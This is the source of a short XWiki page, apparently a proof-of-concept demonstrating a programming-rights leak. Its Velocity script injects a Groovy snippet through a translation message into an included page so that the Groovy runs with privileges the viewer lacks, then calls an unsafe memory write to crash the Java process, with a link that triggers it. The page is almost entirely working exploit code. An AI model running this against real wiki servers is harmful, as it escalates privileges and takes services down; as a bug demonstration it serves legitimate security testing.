Wiki source code of PRLeack

Version 1.1 by Thomas Mortagne on 2016/04/21 16:04

Show last authors
1 {{velocity}}
2 #if($request.getParameter('segfault'))
3 #if($xcontext.hasProgrammingRights())
4 You have PR, segfaulting the machine would be boring.
5 #else
6 #set($msg = {'xe.spaces.action.index': '{{groovy}} new Random().unsafe.putAddress(0,0); {{/groovy}}'})
7 #includeTopic('Main.Spaces')
8 #end
9 #end
10 Do I have programming rights? $xcontext.hasProgrammingRights()
11 {{/velocity}}
12 [[Segfault me>>?segfault=me]]